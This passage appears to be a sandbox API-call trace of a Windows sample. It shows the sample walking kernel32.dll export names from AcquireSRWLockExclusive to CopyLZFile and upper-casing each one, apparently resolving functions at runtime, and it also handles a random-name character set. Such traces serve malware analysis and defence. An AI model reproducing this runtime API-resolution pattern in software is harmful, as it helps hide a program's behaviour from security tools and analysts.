[0078.335] CloseHandle (hObject=0x458) returned 1 [0078.336] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.336] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.336] GetTickCount () returned 0x114c14d [0078.336] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.337] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.337] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.337] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.337] lstrlenA (lpString="kernel32.dll") returned 12 [0078.337] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.337] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.337] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.337] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.337] lstrlenA (lpString="ADDATOMA") returned 8 [0078.337] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.338] lstrlenA (lpString="ADDATOMW") returned 8 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.338] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.338] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.338] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.338] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.338] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.338] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.338] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.338] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.338] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.338] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.338] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.338] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.338] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.338] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.338] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.338] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.338] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.338] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.339] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.339] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.339] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.339] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.339] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.339] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.339] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.339] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.339] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.339] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.339] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.339] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.339] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.339] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.339] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.339] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.340] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.340] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.340] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.340] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.340] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.340] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.340] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.340] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.340] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.340] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.340] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.340] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.340] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.341] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.341] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.341] lstrlenA (lpString="BEEP") returned 4 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.341] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.341] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.341] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.341] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.341] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.341] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.341] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.341] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.341] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.341] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.341] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.341] lstrlenA (lpString="CANCELIO") returned 8 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.341] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.341] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.341] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.342] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.342] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.342] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.342] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.342] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.342] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.342] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.342] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.342] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.342] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.342] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.342] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.342] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.342] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.342] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.342] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.342] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.342] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.342] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.343] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.343] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.343] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.343] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.343] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.343] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.343] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.343] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.343] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.343] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.343] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.343] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.343] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.343] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.343] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.343] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.343] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.343] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.344] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.344] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.344] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.344] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.344] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.344] lstrlenA (lpString="COPYFILEA") returned 9 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.344] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.344] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.344] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.344] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.344] lstrlenA (lpString="COPYFILEW") returned 9 [0078.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") 